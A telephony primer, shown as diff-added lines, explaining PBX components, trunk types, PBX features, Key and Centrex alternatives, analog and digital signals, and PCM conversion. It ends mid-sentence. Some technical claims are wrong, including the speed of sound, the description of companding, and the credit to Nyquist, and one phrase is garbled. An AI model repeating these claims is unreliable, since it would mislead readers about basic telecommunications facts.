+      1.  Common equipment (a processor and a switching matrix)
+      2.  CO trunks
+      3.  Station lines
+
+
+Common Equipment
+
+The operation of a PBX parallels the operation of a Central Office ESS.
+Its common control is
+
+   .  A computer operated Central Processing Unit (CPU) running software
+      that intelligently determines what must be done and how best to do
+      it.
+
+   .  A digital multiplexed switching matrix printed on circuit boards
+      that establishes an interconnection between the calling and called
+      parties.
+
+The CPU stores operating instructions and a database of information from
+which it can make decisions.  It constantly monitors all lines for
+supervisory and control signals.  A switching matrix sets up the
+connections between stations or between stations and outgoing trunks.
+
+Housed in equipment cabinets, PBX common equipment is often compact
+enough to occupy just a closet or small room.  Given the extremely high
+rental rates many companies have, a major benefit of a PBX is its small
+size.
+
+CO Trunks and Station Lines
+
+A trunk is a communication pathway between switches.  A trunk may
+provide a pathway between a PBX and the CO or between two PBXs and two
+COs.  A trunk may be privately owned or be a leased set of lines that
+run through the Public Switched Network.
+
+A line is a communication pathway between a switch and terminal
+equipment, such as between a PBX and an internal telephone or between a
+CO and a home telephone.
+
+The function of the PBX is to interconnect or switch outgoing trunks
+with internal lines.
+
+
+Two Varieties of Lines
+
+Station lines are either analog or digital, depending on the station
+equipment it is connecting.  If the phone on one desk is digital, it
+should be connected to a digital line.  If the phone on the desk is
+analog, it should be connected to an analog line.
+
+
+Varieties of Trunks
+
+There exists a wide variety of trunks that can be connected to a PBX for
+off-premises communication.  Each variety has different functions and
+capabilities.  It is important to be able to distinguish them.
+
+Tie Trunks
+
+Organizations supporting a network of geographically dispersed PBXs
+often use tie trunks to interconnect them.  A tie trunk is a permanent
+circuit between two PBXs in a private network.  Tie trunks are usually
+leased from the common carrier; however, a private microwave arrangement
+can be established. Usually, leased tie trunks are not charged on a per 
+call basis but rather on the length of the trunk.  If a tie trunk is
+used more than one or two hours a day, distance sensitive pricing is
+more economical.
+
+A T1 trunk is a digital CO leased trunk that is capable of being
+multiplexed into 24 voice or data channels at a total rate of 1.544
+Mbps.  T1 trunks are used as PBX-to-PBX tie trunks, PBX-to-CO trunks as
+well as PBX trunks to bypass the local CO and connect directly to a long
+distance carrier.  It is a standard for digital transmission in North
+America and Japan.
+
+T1 uses two pairs of normal, twisted wire--the same as would be found in
+a subscriber's residence.  Pulse Code Modulation is the preferred method
+of analog to digital conversion.
+
+A T2 trunk is capable of 96 multiplexed channels at a total rate of
+6.312 Mbps.
+
+A T3 trunk is capable of 672 multiplexed channels at a total rate of
+44.736 Mbps.
+
+A T4 trunk is capable of 4,032 multiplexed channels at a total of
+274.176 Mbps.
+
+
+Direct Inward Dialing (DID) Trunks
+
+Incoming calls to a PBX often first flow through an attendant position.
+DID trunks allow users to receive calls directly from the outside
+without intervention from the attendant.  DID offers three main
+advantages.
+
+      1. It allows direct access to stations from outside the PBX.
+      2. It allows users to receive calls even when the attendant
+      switchboard is closed.
+      3. It takes a portion of the load off the attendants.
+
+Trunk Pools
+
+Trunks do not terminate at a user's telephone station.  Instead trunks
+are bundled into groups of similarly configured trunks called trunk
+pools.  When a user wants to access a trunk, he can dial a trunk access
+code--for example, he can dial 9 to obtain a trunk in the pool.  Trunk
+pools make system administration less complicated because it is easier
+to administer a small number of groups than a large number of individual
+trunks.
+
+
+Ports
+
+Ports are the physical and electrical interface between the PBX and a
+trunk or station line.
+
+
+PBX Telephones
+
+Telephone stations in a PBX are not directly connected to the CO but to
+the PBX instead.  When a station goes off-hook, the PBX recognizes it
+and sends to the station its own dial tone.  The PBX requires some
+access digit, usually "9" to obtain an idle CO trunk from a pool to
+connect the station with the public network.   This connection between
+the telephone and the PBX allows stations to take advantage of a myriad
+of PBX features.
+
+The attendant console is a special PBX telephone designed to serve
+several functions.  Traditionally, most PBXs have used attendants as the
+central answering point for incoming calls.  Calls placed to the PBX
+first connected to the attendant, who answered the company name.  The
+attendant  then established a connection to the desired party.  The
+attendant also provided assistance to PBX users, including directory
+assistance and reports of problems.
+
+In recent years a number of cost-saving improvements have been made to
+the attendant console.  A feature commonly called automated attendant
+can establish connections without a human interface, substantially
+decreasing PBX operating costs.
+
+Blocking versus Non-blocking
+
+Blocking is a critical aspect of the functioning of a PBX.  A
+non-blocking switch is one that provides as many input/output interface
+ports as there are lines in the network.   In other words, the switching
+matrix provides enough paths for all line and trunk ports to be
+connected simultaneously.
+
+PBX systems are usually blocking.  It requires an exponential increase
+in resources and expense to ensure non-blocking.   Based on call traffic
+studies and the nature of calls, it is generally acceptable to engineer
+a low level of blocking in exchange for a major savings of common
+equipment resources.
+
+Grades of service are quantitative measurements of blocking.  They are
+written in the form:
+
+                 P.xx
+
+where xx is a two digit number that indicates how many calls out of a
+hundred will be blocked.  The smaller the number, the better the grade
+of service.
+
+P.01 means one call out of a hundred will be blocked.  It is a better
+grade of service than P.05 that block five calls out of a hundred.
+Naturally the P.05 service costs less than the better grade of service
+provided by P.01.
+
+Even if a PBX's switching matrix is non-blocking, an internal caller may
+still not be able to reach an outside trunk if all the trunks are busy.
+CO trunks cost money, and very few PBXs dedicate one trunk to every
+internal line. Instead, traffic studies are performed to determine the
+percentage of time a station will be connected to an outside trunk
+during peak hours.
+
+If, for example, it is determined that the average station uses a trunk
+only 20% of the time during peak hours, then the switch may be
+configured to have a 5:1 line-to-trunk ratio, meaning for every five
+lines (or extensions) there is one trunk.  Most PBXs are configured on
+this principle as a major cost saving method.
+
+
+PBX Features
+
+COs and PBXs share many of the same attributes and functionality.
+However, COs are built to perform different tasks than a PBX, resulting
+in feature differences between them.  The following is an overview of
+common PBX features not found in a CO.
+
+Automatic Route Selection (ARS)
+
+A primary concern of any telecommunications manager is to keep costs
+down. One of these costs is long distance service.  ARS is a feature
+that controls long distance costs.
+
+Most PBXs have more than just public CO trunks connected to them.  They
+may have a combination of tie trunks to other PBXs (T1/E1 trunks and
+many others). Each type of trunk has a separate billing scheme,
+relatively more or less expensive for a given number of variables.
+
+It is extremely difficult to attempt to educate company employees on
+which trunks to select for which calls at what time of day.  It defeats
+the productivity-raising, user-transparency goal of any PBX if employees
+must pour over tariffing charts every time they want to use the phone.
+
+Instead, ARS programs the PBX central processor to select the least
+expensive trunk on a call by call basis.  When a user places a call, the
+computer determines the most cost effective route, dials the digits and
+completes the call.
+
+
+Feature Access
+
+PBXs support a wide variety of user features.  For example, call
+forward, hold, and call pickup are all user features.  There are two
+methods of activating a feature.  A code, such as "*62" can be assigned
+to the call forward feature. To activate call forward the user presses
+"*62" and continues dialing.
+
+Dial codes are not the preferred method of feature access.   The problem
+is that users tend to forget the codes and either waste time looking
+them up or do not take advantage of time saving features, thereby
+defeating the purpose of buying them.
+
+Dedicated button feature access is a better solution.   Programmable
+feature buttons, located on most PBX telephones, are pressed to activate
+the desired feature.  If a user wants to activate call forward, he
+presses a button labeled "call forward" and continues dialing.
+
+The only drawback of telephones with programmable feature buttons is
+that they are more expensive than standard phones.
+
+
+Voice Mail
+
+For a voice conversation to occur, there is one prerequisite so obvious
+it is usually overlooked.  The called party must be available to answer
+the call.  In today's busy world, people are often not accessible which
+can create a major problem resulting in messages not being received and
+business not being conducted.
+
+Statistics confirm the need for an alternate method.
+
+      75% of call attempts fail to make contact with the desired party.
+
+      50% of business calls involve one-way information--one party
+      wishing to deliver information to another party without any
+      response necessary.
+
+      50% of incoming calls are less important than the activity they
+      interrupt.
+
+Voice mail (also known as store and forward technology) is a valuable
+feature that is designed around today's busy, mobile office.  It is like
+a centralized answering machine for all telephone stations in a PBX.
+When a telephone is busy or unattended, the systems routes the caller to
+a voice announcement that explains that the called party is unavailable
+and invites the caller to leave a message.  The message is stored until
+the station user enters a security dial access code and retrieves the
+message.
+
+
+Automated Attendant
+
+Automated attendant is a feature sometimes included with voice mail.  It
+allows outside callers to bypass a human attendant by routing their own
+calls through the PBX.  Callers are greeted with a recorded announcement
+that prompts them to dial the extension number of the desired position,
+or stay on the line to be connected to an attendant.
+
+Reducing cost is the primary goal of automated attendant.  The decreased
+attendant work load more d) an pays for the cost of the software and
+equipment.
+
+When automated attendant was first introduced, it met with substantial
+resistance from the general public.  People did not want to talk to a
+machine. But, as its cost effectiveness drove many companies to employ
+it, the public has slowly adjusted to the new technology.
+
+Restriction
+
+Nearly every PBX enforces some combination of inside and outside calling
+restrictions on certain phones.  Depending upon the sophistication of
+the PBX, a system administrator can have nearly unlimited flexibility in
+assigning restrictions.   For example, a tire manufacturing plant could
+restrict all lobby phones at corporate headquarters to internal and
+local calls only.  The phones at the storage warehouse could be
+restricted for only internal calling.  But, all executive phones could
+be left unrestricted.
+
+Long distance toll charges can be a crippling expense.  Toll fraud is a
+major corporate problem.  Restriction combats unauthorized use of
+company telephone resources and is a prime function of any PBX.
+
+
+Tandems
+
+As stated earlier, it is necessary to have a switching mechanism to
+interconnect calls.  If a number of phones all wish to be able to talk
+to each other, an enormous amount of cabling would be wasted tying each
+of them together.  Thus, the switch was born.
+
+The same principle applies for interconnecting PBXs.  Large firms that
+have PBXs scattered all over the country want each PBX to have the
+ability to access every other one.  But the expense of directly
+connecting each could drive a company out of business.  The solution is
+to create a centrally located tandem switching station to interconnect
+the phones from one PBX with the phones from any other.  This solution
+creates a Private Switched Network.
+
+Directing digits are often used to inform the tandem switch where to
+route the call.  Each PBX is assigned a unique number.  Let's say a PBX
+in Paris is numbered "4."  To call the Paris PBX from a PBX in Chicago,
+a user would dial "4- XXXX."
+
+
+Uniform Dialing Plan
+
+A network of PBXs can be configured poorly so that calling an extension
+at another PBX could involve dialing a long, confusing series of numbers
+and create a lot of user frustration.  A Uniform Dialing Plan enables a
+caller to dial another internal extension at any PBX on the network with
+a minimum of digits, perhaps four or five.  The system determines where
+to route the call, translates the digits and chooses the best facility,
+all without the knowledge of the user.  As far as the user knows, the
+call could have been placed to a station at the next desk.
+
+
+Call Accounting System (CAS) and Station Message Detail Recording (SMDR)
+
+CAS works in conjunction with SMDR to identify and monitor telephone
+usage in the system.  SMDR records call information such as the calling
+number, the time of the call, and its duration.  The raw data is usually
+listed chronologically and can be printed on reports.
+
+SMDR by itself is not particularly useful because the sheer volume and
+lack of sorting capability of the reports make them difficult to work
+with.  A Call Accounting Systems is a database program that addresses
+these shortcomings by producing clear, concise management reports
+detailing phone usage.
+
+The primary function of CAS reports is to help control and discourage
+unnecessary or unauthorized use and to bill back calling charges to
+users. Many law firms use a call accounting system to bill individual
+clients for every call they make on behalf of each client.
+
+
+Attendant Features
+
+A number of features are available to improve the efficiency of
+attendant consoles.
+
+Here are a few of them.
+
+      Direct Station Selection (DSS) allows attendants to call any
+      station telephone by pressing a button labeled with its extension.
+
+      Automatic Timed Reminder alerts the attendant that a station has
+      not picked up its call.  The attendant may choose to reconnect to
+      the call and attempt to reroute it.
+
+      Centralized Attendant Service groups all network attendants into
+      the same physical location to avoid redundancies of service and
+      locations.
+
+
+Power Failure Schemes
+
+If a city or a town experiences a commercial power failure, telephones
+connected directly to the CO will not be affected because the CO gets
+power from its own internal battery source.  A PBX, however, is
+susceptible to general power failures because it usually gets its power
+from the municipal electric company.
+
+There are several different ways a PBX can be configured to overcome a
+power failure.
+
+      A PBX can be directly connected to a DC battery which serves as
+      its source of power.  The battery is continually recharged by an
+      AC line to the electric company.  In the event of a power failure,
+      the PBX will continue functioning until the battery runs out.
+
+      A PBX can have an Uninterruptable Power Supply (UPS) to protect
+      against temporary surges or losses of power.
+
+      A PBX can use a Power Failure Transfer (PFT) which, in the event
+      of a power failure, immediately connects preassigned analog phones
+      to CO trunks, thereby using power from the CO instead of from the
+      PBX.
+
+
+Outgoing Trunk Queuing
+
+In the event all outgoing trunks are busy, this feature allows a user to
+dial a Trunk Queuing code and hang up.  As soon as a trunk becomes free,
+the system reserves it for the user, rings the station and connects the
+outside call automatically.
+
+
+System Management
+
+PBXs can be so large and complex that without a carefully designed
+method of system management chaos can result.  The best, most advanced
+systems mimic CO management features--computer access terminals which
+clearly and logically program and control most system features.  The
+system manager has a wide variety of responsibilities which may include,
+but is not limited to
+
+      Programming telephone moves, additions, and changes on the system
+
+      Performing traffic analysis to maximize system configuration
+      resources and optimize network performance
+
+      Responding to system-generated alarms
+
+      Programming telephone, system, attendant, and network features.
+
+
+ISDN
+
+
+ISDN is not a product.  Rather, it is a series of standards created by
+the international body, ITU (previously known as CCITT), to support the
+implementation of digital transmission of voice, data, and image through
+standard interfaces.  Its goal is to combine all communications services
+offered over separate networks into a single, standard network.  Any
+subscriber could gain access to this vast network by simply plugging
+into the wall.  (At this time not all PBXs are compatible with the ISDN
+standard.)
+
+
+Alternatives to a PBX
+
+There are two main alternatives to purchasing a PBX.  They are
+purchasing a Key system or renting Centrex service from the local
+telephone company.
+
+
+Key System
+
+Key systems are designed for very small customers, who typically use
+under 15 lines.  There is no switching mechanism as in a PBX.  Instead
+every line terminates on every phone. Hence, everyone with a phone can
+pick up every incoming call.
+
+Key systems are characterized by a fat cable at the back of each phone.
+The cables are fat because each phone is directly connected to each
+incoming line and each line has to be wired separately to each phone.
+
+Fat cables have become a drawback to Key systems as building wire
+conduits have begun to fill with wire.  It has become increasingly
+difficult to add and move stations because technicians must physically
+rewire the bulky cables instead of simply programming a change in the
+software.
+
+Key telephones are equipped with line assignment buttons that light on
+incoming calls and flash on held calls.  These buttons enable a user to
+access each line associated with each button.  Unlike a PBX, there is no
+need to interface with an attendant console to obtain an outside line.
+
+
+Differences between Key and PBX Systems
+
+      Key systems have no switching matrix.  In a Key system, incoming
+      calls terminate directly on a station user's phone.  In a PBX,
+      incoming calls usually first go to the attendant who switches the
+      call to the appropriate station.
+
+      PBX accesses CO trunk pools by dialing an access code such as "9."
+      Key systems CO trunks are not pooled.  They are accessed directly.
+
+Key systems make use of a limited number of features, many of them
+common to the PBX.  These include
+
+           Last number redial
+           Speed dialing
+           Message waiting lamp
+           Paging
+           Toll restriction
+
+Today's PBXs can simulate Key system operation.  For example, telephones
+can have a line directly terminating on a button for direct access.
+
+
+Centrex
+
+The other alternative to purchasing a PBX is leasing a Centrex service.
+
+Centrex is a group of PBX-like service offerings furnished by the local
+telephone company.  It offers many of the same features and functions
+associated with a PBX, but without the expense of owning and maintaining
+equipment and supporting in-house administrative personnel.
+
+Because network control remains the responsibility  of the CO, companies
+that choose Centrex service over purchasing and maintaining a private
+PBX can ignore the sophisticated world of high tech telecommunications
+and leave it up to the telephone company representatives.
+
+To provide Centrex service, a pair of wires is extended from the CO to
+each user's phone.  Centrex provides an "extension" at each station
+complete with its own telephone number.  No switching equipment is
+located at the customer premises.  Instead, Centrex equipment is
+physically located at the CO.
+
+There are a number of reasons a company would choose a Centrex system
+over owning their own PBX.  Currently Centrex has six million customers
+in the United States market.
+
+Advantages of a Centrex System over a PBX:
+
+      Nearly uninterruptable service due to large redundancies in the CO
+
+      Easily upgraded to advanced features.
+
+      No floor space requirement for equipment.
+
+      No capital investment
+
+      24-hour maintenance coverage by CO technicians
+
+      Inherent Direct Inward Dialing (DID).  All lines terminate at
+      extensions, instead of first flowing through a switchboard.
+
+      Call accounting and user billing as inherent part of the service.
+
+      Reduced administrative payroll.
+
+
+Disadvantages of a Centrex System:
+
+      Cost.  Centrex is tariffed by the local telephone company and can
+      be very expensive.  Companies are charged for each line connected
+      to the Centrex, as well for the particular service plan chosen.
+      Additionally, Centrex service may be subject to monthly increases.
+
+      Feature availability.  Centrex feature options are generally not
+      state of the art, lagging behind PBX technology.  Not all COs are
+      of the same generation and level of sophistication--a company
+      associated with an older CO may be subject to inferior service and
+      limited or outdated feature options.
+
+      Control of the network is the responsibility of the CO.  While
+      this release from responsibility is often cited as a positive
+      feature of Centrex, there are drawback to relinquishing control.
+      CO bureaucracy can be such that a station move, addition or change
+      can sometimes take days to achieve.   Furthermore, each request is
+      charged a fee.  Also, some companies are more particular about
+      certain features of their network (security for example) and
+      require direct control for themselves.
+
+
+
+	.------------------------------------------.
+3	| Properties of Analog and Digital Signals |
+	`------------------------------------------'
+
+A man in Canada picks up a telephone and dials a number.  Within
+seconds, he begins talking to his business partner in Madrid.  How can
+this be?
+
+Telephony is a constantly evolving technology with scientific rules and
+standards.  You will learn to make sense of what would otherwise seem
+impossible.
+
+Voice travels at 250 meters per second and has a range limited to the
+strength of the speaker's lungs.  In contrast, electricity travels at
+speeds approaching the speed of light (310,000 Km per second) and can be
+recharged to travel lengths spanning the globe.  Obviously, electricity
+is a more effective method of transmission.
+
+To capitalize on the transmission properties of electricity, voice is
+first converted into electrical impulses and then transmitted.  These
+electrical impulses represent the varying characteristics that
+distinguish all of our voices.  The impulses are transmitted at high
+speeds and then decoded at the receiving end into a recognizable
+duplication of the original voice.
+
+For a hundred years, scientists have been challenged by how best to
+represent voice by electrical impulses.  An enormous amount of effort
+has been devoted to solving this puzzle.  The two forms of electrical
+signals used to represent voice are analog and digital.
+
+Both analog and digital signals are composed of waveforms.  However,
+their waveforms have very distinctive properties which distinguish them.
+To understand the science of telephony, it is necessary to understand
+how analog and digital signals function, and what the differences
+between them are.
+
+If you do not possess a fundamental understanding of basic waveforms,
+you will not understand many of the more advanced concepts of
+telecommunications.
+
+
+Analog Signal Properties
+
+Air is the medium that carries sound.  When we speak to one another, our
+vocal chords create a disturbance of the air.  This disturbance causes
+air molecules to become expanded and compress thus creating waves.  This
+type of wave is called analog, because it creates a waveform similar to
+the sound it represents.
+
+Analog waves are found in nature.  They are continually flowing and have
+a limitless number of values.  The sine wave is a good example of an
+analog signal.
+
+
+Three properties of analog signals are particularly important in
+transmission:
+
+                   amplitude      frequency      phase
+
+Amplitude
+
+Amplitude refers to the maximum height of an analog signal.  Amplitude
+is measured in decibels when the signal is measured in the form of
+audible sound. Amplitude is measured in volts when the signal is in the
+form of electrical energy.
+
+
+                       Amplitude of an Analog Wave
+
+
+Volts represent the instantaneous amount of power an analog signal
+contains.
+
+Amplitude, wave height, and loudness of an analog signal represent the
+same property of the signal.  Decibels and volts are simply two
+different units of measurement which are used to quantify this property.
+
+Frequency
+
+Frequency is the number of sound waves or cycles that occur in a given
+length of time.  A cycle is represented by a 360 degree sine wave.
+Frequency is measured in cycles per second, commonly called hertz (Hz).
+
+Frequency corresponds to the pitch (highness or lowness) of a sound. The
+higher the frequency, the higher the pitch.  The high pitch tone of a
+flute will have a higher frequency than the low pitch tone of a bass.
+
+Phase refers to the relative position of a wave at a point in time.  It
+is useful to compare the phase of two waves that have the same frequency
+by determining whether the waves have the same shape or position at the
+same time.  Waves that are in-step are said to be in phase, and waves
+that are not synchronized are called out-of-phase.
+
+Modulation
+
+
+The reason these three properties are significant is that each can be
+changed (modulated) to facilitate transmission.
+
+The term modulation means imposing information on an electrical signal.
+
+The process of modulation begins with a wave of constant amplitude,
+frequency, and phase called carrier wave.  Information signals
+representing voice, data, or video modulate a property (amplitude,
+frequency, or phase) of the carrier wave to create a representation of
+itself on the wave.
+
+Amplitude Modulation is a method of adding information to an analog
+signal by varying its amplitude while keeping its frequency constant. AM
+radio is achieved by amplitude modulation.
+
+Frequency Modulation adds information to an analog signal by varying its
+frequency while keeping its amplitude constant.  FM radio is achieved by
+frequency modulation.
+
+Phase Modulation adds information to an analog signal by varying its
+phase.
+
+The modulated wave carrying the information is then transmitted to a
+distant station where it is decoded and the information is extracted
+from the signal. 
+
+
+Properties of Digital Signals
+
+
+Unlike analog signals, digital signals do not occur in nature.  Digital
+signals are an invention of mankind.  They were created as a method of
+coding information.  An early example of digital signals is the Morse
+Code.
+
+Digital signals have discrete, non-continuous values.  Digital signals
+have only two states:
+
+
+       Type of Signal                  State
+       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+       Light switch           On                    Off
+
+
+       Voltage                Voltage Level 1       Voltage Level 2
+                              (-2 volts)            (+2 volts)
+
+       Morse                  Short beat            Long beat
+
+
+
+Computers and humans cannot communicate directly with each other.  We do
+not understand what tiny bits and voltage changes mean.  Computers do
+not understand the letters of the alphabet or words.
+
+For computers and humans to communicate with each other, a variety of
+binary (digital) languages, called character codes, have been created.
+Each character of a character code represents a unique letter of the
+alphabet:  a digit, punctuation mark, or printing character.
+
+The most popular character code is call ASCII (America Standard Code for
+Information Interchange).  It uses a seven bit coding scheme-- each
+character consists of a unique combination of seven 1s and 0s.  For
+example, the capital letter T is represented by the ASCII 1010100; the
+number 3 by the ACSII 0110011. The maximum number of different
+characters which can be coded in ASCII is 128).
+
+
+                      English          ASCII
+
+                         T             1010100
+
+                         3             0110011
+
+
+Another character code is called Extended ASCII.  Extended ASCII builds
+upon the existing ASCII character code.  Extended ASCII codes characters
+into eight bits providing 256 character representations).  The extra 127
+characters represent foreign language letters and other useful symbols.
+
+
+Signal Loss - Attenuation
+
+Analog and digital signals are transmitted to provide communication over
+long distances.  Unfortunately, the strength of any transmitted signal
+weakens over distance.  This phenomenon is called attenuation.  Both
+analog and digital signals are subject to attenuation, but the
+attenuation is overcome in very different ways.
+
+
+Analog Attenuation
+
+Every kilometer or so, an analog signal must be amplified to overcome
+natural attenuation.  Devices called amplifiers boost all the signals
+they receive, strengthening the signals to their original power.  The
+problem is that over distance, noise is created and it is boosted along
+with the desired signal.
+
+The result of using amplifiers is that both the noise (unwanted
+electrical energy) and the signal carrying the information are
+amplified.  Because the noise is amplified every kilometer, it can build
+up enough energy to make a conversation incomprehensible.  If the noise
+becomes too great, communication may become impossible.
+
+Two different types of noise affect signal quality.
+
+      White noise is the result of unwanted electrical signals over
+      lines.  When it becomes loud enough, it sounds like the roar of
+      the ocean at a distance.
+
+      Impulse noise is caused by intermittent disturbances such as
+      telephone company switch activity or lightning.  It sounds like
+      pops and crack over the line.
+
+As analog signals pass through successive amplifiers, the noise is
+amplified along with the signal and therefore causes the signal to
+degenerate.
+
+
+Digital Attenuation
+
+Although digital signals are also affected by attenuation, they are
+capable of a much more effective method to overcome signal loss.  A
+device called a regenerative repeater determines whether the incoming
+digital signal is a 1 or a 0.  The regenerative repeater then recreates
+the signal and transmits it at a higher signal strength.  This method is
+more effective than repeating an analog signal because digital signals
+can only be one of two possible states.  Remember that an analog signal
+is comprised of an infinite number of states.)
+
+The advantage of a digital regenerator is that noise is not reproduced.
+At each regenerative repeater, all noise is filtered out-- a major
+advantage over analog amplification.
+
+
+Advantages of Digital over Analog Signals
+
+
+1.    Digital regenerative repeaters are superior to analog amplifiers.
+
+      A buildup of noise causes a distortion of the waveform.  If the
+      distortion is large enough, a signal will not arrive in the same
+      form as it was transmitted.  The result is errors in transmission.
+
+      In digital transmission, noise is filtered out leaving a clean,
+      clear signal.  A comparison of average error rates shows
+
+                 Analog:    1 error every 100,000 signals
+
+                 Digital:   1 error every 10,000,000 signals
+
+2.    The explosion of modern digital electronic equipment on the market
+      has greatly reduced its price, making digital communications
+      increasingly more cost effective.  The price of computer chips,
+      the brains of electronic equipment, has dropped dramatically in
+      recent years further reducing the price of digital equipment.
+
+      This trend will almost certainly continue adding more pressure to
+      use digital methods.
+
+
+3.    An ever increasing bulk of communication is between digital
+      equipment (computer-to-computer)
+
+      For most of telephony history, long distance communication meant
+      voice telephone conversations.  Because voice is analog in nature,
+      it was logical to use analog facilities for transmission.  Now the
+      picture is changing.  More and more communication is between
+      computers, digital faxes, and other digital transmission devices.
+
+      Naturally, it is preferable to send digital data over digital
+      transmission equipment when both sending and receiving devices are
+      digital since there is no need to convert the digital signals to
+      analog to prepare them for analog transmission.
+
+Historically, telephone networks were intended to carry analog voice
+traffic. Therefore, equipment was designed to create, transmit, and
+process analog signals.  As technology in computers (microprocessors)
+and digital transmission has advanced, nearly all equipment installed in
+new facilities are digital.
+
+
+	.---------------------------.
+4	| Analog-Digital Conversion |
+	`---------------------------'
+
+
+Because it offers better transmission quality, almost every long
+distance telephone communication now uses digital transmission on the
+majority of their lines.  But since voice in its natural form is analog,
+it is necessary to convert these.  In order to transmit analog waves
+over digital facilities to capitalize on its numerous advantages, analog
+waves are converted to digital waves.
+
+
+Pulse Code Modulation (PCM)
+
+The conversion process is called Pulse Code Modulation (PCM) and is
+performed by a device called a codec (coder/decoder).  PCM is a method
+of converting analog signals into digital 1s and 0s, suitable for
+digital transmission.  At the receiving end of the transmission, the
+coded 1s and 0s are reconverted into analog signals which can be
+understood by the listener.
+
+
+Three Step Process of PCM
+
+
+Step 1 - Sampling
+
+
+Sampling allows for the recording of the voltage levels at discrete
+points in prescribed time intervals along an analog wave.  Each voltage
+level is called a sample.  Nyquist's Theorem states:
+
+      If an analog signal is sampled at twice the rate of the highest
+      frequency it attains, the reproduced signal will be a highly
+      accurate reproduction of the original.
+
+The highest frequency used in voice communications is 4000 Hz (4000
+cycles per second).  Therefore, if a signal is sampled 8000 times per
+second, the listener will never know they have been connected and
+disconnected 8000 times every second!  They will simply recognize the
+signal as the voice of the speaker.
+
+To visualize this procedure better, consider how a movie works.  Single
+still frames are sped past a light and reproduced on a screen.  Between
+each of the frames is a dark space.  Since the frames move so quickly,
+the eye does not detect this dark space.  Instead the eye perceives
+continuous motion from the still frames.
+
+PCM samples can be compared to the still frames of a movie.  Since the
+voice signal is sampled at such frequent intervals, the listener does
+not realize that there are breaks in the voice and good quality
+reproduction of voice can be achieved.  Naturally, the higher the
+sampling rate, the more accurate the reproduction of the signal.  Dr.
+Nyquist was the one who discovered that only 8000 samples per second are
+needed for excellent voice reproduction.
+
+The 8000 samples per second are recorded as a string of voltage levels.
+This string is called a Pulse Amplitude Modulation (PAM) signal.
+
+
+Step 2 - Quantizing
+
+
+Since analog waves are continuous and have an infinite number of values,
+an infinite number of PAM voltage levels are needed to perfectly
+describe any analog wave.  In practice, it would be impossible to
+represent each exact PAM voltage level.  Instead, each level is rounded
+to the nearest of 256 predetermined voltage levels by a method called
+Quantizing.
+
+Quantizing assigns each PAM voltage level to one of 256 amplitude
+levels.  The amplitude levels do not exactly match the amplitude of the
+PAM signal but are close enough so only a little distortion results.
+
+This distortion is called quantizing error.  Quantizing error is the
+difference between the actual PAM voltage level and the amplitude level
+it was rounded to.  Quantizing error produces quantizing noise.
+Quantizing noise creates an audible noise over the transmission line.
+
+Low amplitude signals are affected more than high amplitude signals by
+quantizing noise.  To overcome this effect, a process call companding is
+employed.  Low amplitude signals are sampled more frequently than high
+amplitude signals.  Therefore, changes in voltage along the waveform
+curve can be more accurately distinguished.
+
+Companding reduces the effect of quantizing error on low amplitude
+signals where the effect is greatest by increasing the error on high
+amplitude signals where the effect is minimal.  Throughout this process,
+the total number of samples remains the same at 8000 per second.
+
+Two common companding formulas are used in different parts of the world.
+The United States and Japan follow a companding formula called Mu-Law.
+In Europe and other areas of the world, the formula is slight different
+and is called A-Law.  Although the two laws differ only slightly, they
+are incompatible.  Mu-Law hardware cannot be used in conjunction with
+A-Law hardware.
+
+
+Step 3 - Encoding
+
+Encoding converts the 256 possible numeric amplitude voltage levels into
+binary  8-bit digital codes.  The number 256 was not arrived at
+accidentally. The reason there are 256 available amplitude levels is
+that an 8-bit code contains 256 (28) possible combinations of 1s and 0s.
+These codes are the final product of Pulse Codes Modulation (PCM) and
+are ready for digital transmission.
+
+PCM only provides 256 unique pitches and volumes.  Every sound that is
+heard over a phone is one of these 256 possible sounds.
+
+Digital-Analog Conversion
+
+After the digital bit stream is transmitted, it must be convert back to
+an analog waveform to be audible to the human ear.  This process is
+called Digital-Analog conversion and is essentially the reverse of PCM.
+
+This conversion occurs in three steps.
+
+Step 1 - Decoding
+
+      Decoding converts the 8-bit PCM code into PAM voltage levels.
+
+Step 2 - Reconstruction
+
+      Reconstruction reads the converted voltage level and reproduces
+      the original analog wave
+
+Step 3 - Filtering
+
+      The decoding process creates unwanted high frequency noise in the
+      4000 Hz - 8000 Hz range which is audible to the human ear.  A
+      low-pass filter blocks all frequencies above one-half the sampling
+      rate, eliminating any frequencies above 4000 Hz.
+
+
+	.----------------------.
+5	| Digital Transmission |
+	`----------------------'
+
+Importance of Digital Transmission
+
+Digital transmission is the movement of computer-encoded binary
+information from one machine to another.  Digital information can
+represent voice, text, graphics, and video.
+
+Digital communication is important because we use it everyday.  You have
+used digital communications if
+
+      - your credit card is scanned at the checkout line of a department
+        store.
+
+      - you withdraw money from an automated teller machine. 
+
+      - you make an international call around the world. 
+
+There are a million ways digital communication affects us every day.
+
+As computer technology advances, more and more of our lives are affected
+by digital communication.  A vast amount of digital information is
+transmitted every second of every day.  Our bank records, our tax
+records, our purchasing records, and so much more is stored as digital
+information and transferred whenever and wherever it is needed.  It is
+no exaggeration to say that digital communications will continue to
+change our lives from now on.
+
+
+Digital Voice Versus Digital Data
+
+
+The difference between voice and non-voice data is this:
+
+      Voice transmission represents voice while data transmission
+      represents any non-voice information, such as text, graphics, or
+      video.  Both can be transmitted in identical format--as digitized
+      binary digits
+
+In order to distinguish digital voice binary code from digital data,
+since they both look like strings of 1s and 0s, you must know what the
+binary codes represent.
+
+This leads us to another important distinction-- that between digital
+transmission and data transmission.  Although these two terms are often
+confused, they are not the same thing.
+
+      Digital transmission describes the format of the electrical
+      signal--1s and 0s as opposed to analog waves.
+
+      Data transmission describes the type of information transmitted-
+      -text, graphics, or video as opposed to voice.
+
+Basic Digital Terminology
+
+A bit is the smallest unit of binary information--a "1" or a "0"
+
+A byte is a "word" of 7 or 8 bits and can represent a unit of
+information such as a letter, a digit, a punctuation mark, or a printing
+character (such as a line space).
+
+BPS (bits per second) or bit rate refers to the information transfer
+rate-- the number of bits transmitted in one second.  BPS commonly refers
+to a transmission speed.
+
+Example: 
+
+      A device rated at 19,200 bps can process more information than one
+      rated at 2,400 bps.  As a matter of fact, eight times more.  Bps
+      provides a simple quantifiable means of measuring the amount of
+      information transferred in one second.
+
+Bits per second is related to throughput.  Throughput is the amount of
+digital data a machine or system can process.  One might say a machine
+has a "high throughput," meaning that it can process a lot of information.
+
+
+Digital Data Transmission
+
+
+Data communications is made up of three separate parts:
+
